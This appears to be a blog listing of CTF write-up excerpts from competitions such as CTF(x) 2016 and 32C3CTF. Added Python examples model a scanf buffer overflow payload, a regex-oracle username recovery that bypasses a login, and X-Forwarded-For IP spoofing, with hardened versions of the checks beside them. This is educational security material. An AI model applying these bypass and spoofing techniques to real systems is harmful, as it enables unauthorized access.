NUS Greyhats at CDDC 2015 and (Almost) Epic Mass Exploitation

Disclaimer: All opinions shared in this article are solely mine and I do not represent anyone else. Also, please do note the distinction between ‘Gamemaster’ and ‘Hardware and Network Vendor’ when the terms do appear in the text. Edit (240615 15:40): After speaking to other attendees, I realised I wasn’t quite accurate in how I was…


CTF(x) 2016 – guesslength (Binary)

We are given the following source code:

There is an obvious buffer overflow: scanf reads an unbounded amount of input into the struct. However, we don't want to overflow too far, or we will overwrite the flag that is stored in the same struct. Our solution is to write just enough to…
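The point above is the length arithmetic: a `%s` conversion writes the token plus a terminating NUL, so "just enough" means stopping one byte short of the flag. The following is an added model of that arithmetic, not the challenge source or the author's script; the struct layout (a 16-byte guess buffer, a 32-bit length, then the flag), the `scanf_s` memory model and the sample flag are all hypothetical stand-ins chosen for illustration:

```python
import struct

# Hypothetical layout standing in for the challenge's struct (the real source
# is not reproduced on this page): char guess[16]; uint32_t length; char flag[32];
# little-endian, no padding.
LAYOUT = "<16sI32s"
GUESS_OFF, LEN_OFF, FLAG_OFF = 0, 16, 20
SIZE = struct.calcsize(LAYOUT)  # 52 bytes

ORIGINAL_FLAG = b"ctf(constructed_flag)"  # constructed sample, not the real flag


def fresh_struct():
    """Struct memory as it sits before scanf runs: empty guess, length 0, flag set."""
    return bytearray(struct.pack(LAYOUT, b"", 0, ORIGINAL_FLAG))


def scanf_s(memory, dest_off, token):
    """Model of scanf("%s", s.guess): copies the token plus a terminating NUL
    with no bound check, so a long token runs straight into the next fields."""
    data = token + b"\x00"
    if dest_off + len(data) > len(memory):
        raise ValueError("token runs past the end of the struct; outside this model")
    memory[dest_off:dest_off + len(data)] = data
    return memory


def fields(memory):
    """Decode the three fields back out of the raw bytes."""
    guess, length, flag = struct.unpack_from(LAYOUT, memory)
    return guess.rstrip(b"\x00"), length, flag.rstrip(b"\x00")


def max_safe_token_len():
    """Longest %s token whose trailing NUL still lands before flag."""
    # 19: 16 bytes fill guess, 3 spill into length, the NUL becomes length's top byte.
    return FLAG_OFF - GUESS_OFF - 1


def build_token(length_value):
    """Token that fills guess and sets length to length_value without touching flag.
    Only the low three bytes are controllable: the fourth byte of length is the NUL
    scanf appends. %s also stops at whitespace, so those byte values are rejected."""
    if not 0 <= length_value < 2 ** 24:
        raise ValueError("top byte of length is always the NUL terminator")
    tail = length_value.to_bytes(3, "little")
    if any(b in b" \t\n\r\x0b\x0c" for b in tail):
        raise ValueError("whitespace bytes would end the %s token early")
    return b"A" * (LEN_OFF - GUESS_OFF) + tail


def overflow_result(token):
    """Run the overflow on a fresh struct; return (length value, flag still intact?)."""
    mem = scanf_s(fresh_struct(), GUESS_OFF, token)
    _, length, flag = fields(mem)
    return length, flag == ORIGINAL_FLAG
```

A 19-byte token leaves the flag alone and sets the length's low three bytes; a 20-byte token puts the NUL on the flag's first byte, which is exactly the "overflow too much" case the writeup warns about.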


CTF(x) 2016 – Harambe Hub

The authentication is insecure because the application uses String.match instead of String.equals to compare the provided credentials with the stored credentials. String.match performs a regular-expression match, so we can supply regex patterns to deduce the correct username to authenticate as, and use '.*' as the password to get the real name of an admin. Solving script:

Running the…
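To make the regex-oracle attack concrete, here is an added example in Python; it is not the author's solving script and it does not talk to the challenge server. `vulnerable_login` models the flawed check with `re.search` (an unanchored match, like String.match), `safe_login` is the corrected exact comparison, and `recover_username` rebuilds a stored username one character at a time through the oracle. The user table, the account names and the `(?=.*admin)` lookahead used to pick the admin account are all constructed for this example:

```python
import hmac
import re
import string

# Constructed credential store standing in for the application's; not the real data.
USERS = {
    "harambe_admin": {"password": "g0rilla!", "real_name": "Harambe"},
    "guest": {"password": "guest", "real_name": "Visitor"},
}


def vulnerable_login(username, password):
    """Model of the flawed check: both credentials are compared with a regex
    search (String.match semantics) instead of an exact equality test.
    Returns the account's real name on success, otherwise None."""
    for stored_user, record in USERS.items():
        # Unanchored regex search: 'a' matches any username containing 'a',
        # and '.*' matches every password.
        if re.search(username, stored_user) and re.search(password, record["password"]):
            return record["real_name"]
    return None


def safe_login(username, password):
    """Hardened check: exact lookup plus a constant-time comparison."""
    record = USERS.get(username)
    if record is None:
        return None
    if hmac.compare_digest(record["password"].encode(), password.encode()):
        return record["real_name"]
    return None


def recover_username(oracle, seed=r"^", alphabet=string.ascii_lowercase + string.digits + "_"):
    """Rebuild a stored username one character at a time using the login oracle.
    `seed` is a regex prefix that selects which account to target, for example
    r"^(?=.*admin)" for a username containing 'admin'. The password is always
    '.*' so that half of the check never fails. Returns None if nothing matches."""
    known = ""
    while True:
        # Anchoring with '$' tells us when the whole username has been recovered.
        if oracle(seed + re.escape(known) + "$", ".*") is not None:
            return known
        for c in alphabet:
            if oracle(seed + re.escape(known + c), ".*") is not None:
                known += c
                break
        else:
            return None  # no single-character extension matched


if __name__ == "__main__":
    print("admin account:", recover_username(vulnerable_login, seed=r"^(?=.*admin)"))
    print("real name via '.*':", vulnerable_login("harambe_admin", ".*"))
```

Each recovered character costs at most one request per alphabet symbol, so the whole username falls in a few hundred requests; against `safe_login` the same '.*' password is just a wrong eleven-byte string.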


CTF(x) 2016 – North Korea (Web)

Pretty easy challenge. We need to spoof our originating IP address by setting the 'X-Forwarded-For' header, which the site trusts as the client address. Obviously, we should use an IP address within the North Korean range.

Flag: ctf(jk_we_aint_got_n0_nuk35)
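The trick works only because the server believes whatever the first X-Forwarded-For hop says. Below is an added example, not the challenge's code or the author's script, showing the attacker's header, the naive server-side check that it fools, and a hardened version that only honours hops appended by the site's own proxies. The trusted-proxy range, the non-Korean client address and the header values are constructed; 175.45.176.0/22 is the well-known IPv4 block allocated to North Korea:

```python
import ipaddress

NORTH_KOREA = [ipaddress.ip_network("175.45.176.0/22")]
# Constructed: the range the site's own reverse proxies connect from.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def forged_request_headers(spoofed_ip="175.45.176.1"):
    """Headers the solver sends; the X-Forwarded-For value is entirely attacker-chosen."""
    return {"X-Forwarded-For": spoofed_ip}


def client_ip_naive(remote_addr, headers):
    """Vulnerable: believes the first X-Forwarded-For hop, whoever sent it."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr, headers):
    """Walk the chain from the right, starting at the TCP peer (which cannot be
    forged), skip our own proxies, and report the first hop that is not ours."""
    chain = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    chain.append(remote_addr)
    for hop in reversed(chain):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr  # malformed header: fall back to the socket peer
        if not any(addr in net for net in TRUSTED_PROXIES):
            return str(addr)
    return remote_addr


def is_north_korean(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in NORTH_KOREA)


if __name__ == "__main__":
    hdrs = forged_request_headers()
    print("naive sees:", client_ip_naive("203.0.113.5", hdrs))
    print("hardened sees:", client_ip_hardened("203.0.113.5", hdrs))
```

With the naive check a direct connection from 203.0.113.5 is classified as Korean; with the hardened check the spoofed hop is ignored because the peer itself is not a trusted proxy, and when a real proxy appends the true client address that address wins.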


CTF(x) 2016 – Custom Auth (Crypto)

Full writeup to come when I get the time

Running the script:

Flag: ctf(ecb_m0de_too_Ez?)


CTF(x) 2016 – Dat Boinary (Binary)

We were pretty happy to have solved this first during the competition. Here's the solving script:

Running the script:

Flag: ctf(0n1y_th3_fr35h35t_m3m3s)

PS: A detailed write-up with Binary Ninja is coming (since everyone's doing it :))


X-CTF Qualifiers 2016 – The Snek (Web)

Breedom ain't bree. OK. The world gonna be litterd with the sneks. Praise snek. http://188.166.226.181:8081.

I designed this challenge for the Qualifying CTF for X-CTF 2016, a CTF aimed at inter-varsity competition. This actually went unsolved, so here's the intended solution 🙂 First, let's visit the website. Clicking on the link below…


HackIM 2016 Case Study

Introduction

The Dystopian Narwhals played in the HackIM 2016 CTF organised by Nullcon last weekend and I must say, it was one of the most controversial I've ever experienced. In this post, I will briefly describe the competition format, the controversies, and provide an analysis of the overall experience from the point of view of…


32C3CTF – Kummerkasten (Web 300)

Our Admin is a little sad this time of the year. Maybe you can cheer him up at this site. Please note: This challenge does not follow the flag format.

When navigating to the website, we are shown a message about the depressed admin and a form to send him messages. Turns out, the website…


32C3CTF – Gurke (Misc 300)

Non-standard gurke: https://32c3ctf.ccc.ac/uploads/gurke Talk to it via HTTP on http://136.243.194.43/.

We are given a vulnerable Python script here:

What this script does is:

1. Initialise a variable flag over a socket.
2. Apply seccomp rules to restrict syscalls. This is particularly important to note because we now do not have the option of connecting to the server to…


32C3CTF – TinyHosting (Web 250)

A new file hosting service for very small files. Could you pwn it? http://136.243.194.53/

In the comments, there is a hint to use ./?src to obtain the source code of index.php.

From the returned source, we get some very interesting PHP code:

What the code does is: Create a $savepath variable that is derived…
